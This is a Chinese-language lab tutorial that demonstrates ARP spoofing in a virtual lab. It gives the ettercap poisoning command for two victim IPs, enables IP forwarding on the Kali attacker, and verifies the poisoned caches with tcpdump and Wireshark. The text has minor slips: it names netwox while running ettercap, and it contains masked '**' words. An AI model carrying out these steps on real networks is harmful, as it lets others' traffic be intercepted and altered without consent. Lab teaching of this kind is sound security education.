ARP協議攻擊與防禦 ARP欺騙

在本實驗中，針對arp協議無驗證缺陷，進行arp欺騙以實施中間人攻擊，通過實驗實現

根據提供的實驗環境，owasp節點和seedubuntu節點之間正常通行時資料報將不會經過kali節點。攻擊節點kali將通過arp欺騙成文中間人，從而截獲seedubuntu和owasp節點之間的資料報，並可對資料報內容進行篡改。

seedubuntu和owasp節點的網路配置只需在虛擬機器的設定選單中更改網路連線方式為nat即可。

實驗中的虛擬機器

arp欺騙攻擊的根源在於arp協議在設計時認為區域網內部的所有使用者都是可信的，當攻擊者滲透進入內網後，通過向區域網內節點快取中注入偽造的ip/mac對映關係，從而進行欺騙，成為區域網內的中間人節點，即可以監聽並進一步篡改資料報。

注：這裡的ip是測試環境的ip，自己做實驗時需要替換成實驗環境中的ip

1.seed ubuntu節點與owasp節點正常通行

在seedubuntu節點下，利用瀏覽器訪問owasp的web服務如下圖所示：

2.kali節點進行arp欺騙攻擊

1) 檢視攻擊前arp快取表

在實施攻擊前，在seedubuntu和owasp分別輸入arp命令，確認arp快取狀態，如下所示：

root@ubuntu:~# arp -a
? (192.168.200.2) at 00:50:56:fc:e8:4b [ether] on eth0
? (192.168.200.125) at 00:0c:29:41:23:0e [ether] on eth0

2) 利用netwox進行中間人欺騙攻擊，即同時傳送偽造的arp響應報文到seed ubuntu和owasp節點

root@kali:~# ettercap -tqi eth0 -m arp:remote /192.168.200.125// /192.168.200.124//

2 hosts added to the hosts list...

arp poisoning victims:

group 1 : 192.168.200.125 00:0c:29:41:23:0e

group 2 : 192.168.200.124 00:0c:29:2c:c0:07

starting unified sniffing...

3) 開啟kali節點的ip**功能：

root@kali:~# cat /proc/sys/net/ipv4/ip_forward
0root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@kali:~# cat /proc/sys/net/ipv4/ip_forward
1

4) 分析arp欺騙攻擊資料報

在seed ubuntu或owasp節點下，執行tcpdump命令，檢視arp資料報，如下所示：

root@ubuntu:/home/seed# tcpdump -i eth0 arp -n

tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

listening on eth0, link-type en10mb (ethernet), capture size 65535 bytes

04:34:33.690429 arp, reply 192.168.200.124 is-at 00:0c:29:da:ee:f6, length 46

04:34:33.690445 arp, reply 192.168.200.125 is-at 00:0c:29:da:ee:f6, length 46

可以看到，192.168.200.124和192.168.200.125的mac對映位址全被設定為kali節點的mac位址00:0c:29:da:ee:f6，此時再執行arp命令檢視arp快取，如下所示：

root@ubuntu:/home/seed# arp -a
? (192.168.200.2) at 00:50:56:fc:e8:4b [ether] on eth0
? (192.168.200.125) at 00:0c:29:da:ee:f6 [ether] on eth0

3.中間人資料分析

在seedubuntu節點下，再次利用瀏覽器訪問owasp的web服務同時在kali節點下開啟wireshark，可以看到seedubuntu和owasp間的資料報經由kali節點進行**：

wireshark 要進行ip過濾：!tcp.port==3389